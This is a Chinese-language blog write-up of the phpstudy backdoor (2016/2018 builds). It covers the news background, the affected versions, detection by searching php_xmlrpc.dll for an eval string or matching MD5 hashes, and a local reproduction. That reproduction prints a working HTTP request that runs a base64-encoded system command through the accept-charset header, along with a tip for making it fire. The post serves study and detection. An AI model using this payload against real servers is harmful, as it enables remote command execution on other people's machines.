phpstudy漏洞復現

前言

在玩手機的時候，發現微信推了一篇文章，案件背景如下：

2018年12月4日，西湖區公安分局網警大隊接報案，某公司發現公司內有20餘臺計算機被執行危險命令，疑似遠程控制抓取賬號密碼等計算機數據回傳大量敏感信息。通過專業技術溯源進行分析，查明瞭數據回傳的信息種類、原理方法、存儲位置，並聘請了第三方鑑定機構對軟件中的“後門”進行司法鑑定，鑑定結果是該“後門”文件具有控制計算機的功能，嫌疑人已通過該後門遠程控制下載運行腳本實現收集用戶個人信息。在2019年9月20日，網上爆出phpstudy存在“後門”。作者隨後發佈了聲明。
於是想起自己安裝過phpstudy軟件，趕緊查一下是否存在後門文件，結果一看真存在後門，學個PHP真是不容易，軟件被別人偷偷安裝了後門。

phpstudy是一款PHP調試環境的程序集成包，集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款軟件一次性安裝，無需配置，即裝即用。由於其免費且方便的特性，在國內有着近百萬的PHP語言學習者、開發者用戶。

影響版本

phpstudy 2016版php-5.4

phpstudy 2018版php-5.2.17

phpstudy 2018版php-5.4.45

後門檢測

作爲學生黨，我也一直在用phpstudy，所以要看看是不是自己的phpstudy也存在這個後門。

檢測方法

看了一些文章之後，發現這個後門是在phpstudy 2018版php-5.2.17和phpstudy 2018版php-5.4.45的\ext\php_xmlrpc.dll，

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-z4QefP4k-1569574450694)(C:\Users\17295\AppData\Roaming\Typora\typora-user-images\1569572216340.png)]

打開這兩個文件，ctrl+F搜索一下，看看有沒有eval，文件存在@eval(%s(‘%s’))證明漏洞存在，

結果，，，

顯然，我的phpstudy存在後門，也可以利用MD5值檢測是不是存在後門。

後門文件MD5值：
MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9
MD5: C339482FD2B233FB0A555B629C0EA5D5

後門的原理我不懂 。。。但是也看到了幾篇文章，以後可以看看。

http://www.52bug.cn/hkjs/6100.html

https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw

後門利用

這裏是大佬的後門包

GET /test/2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
accept-charset: (這裏是你要執行的命令的base64加密值)ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Connection: close
Cookie: _ga=GA1.1.994769775.1540538530; security_level=0
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

**accept-charset: **字段要寫要執行命令的base64值

在本地隨便寫個PHP文件，把phpstudy的版本切換到5.4.45或者5.2.17，用bp抓包，

然後添加，

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7是echo system(“net user”);的base64值，

即可得到當前用戶，

在這裏的時候，出現一個問題，

gzip和deflate之間有一個空格，有空格的時候，會導致無法利用這個後門，要把這個空格刪掉纔行。

phpstudy後門rce批量利用腳本

參考文章

https://www.cnblogs.com/yuzly/p/11565997.html

https://blog.csdn.net/weixin_43886632/article/details/101294081

https://www.cnblogs.com/-qing-/p/11575622.html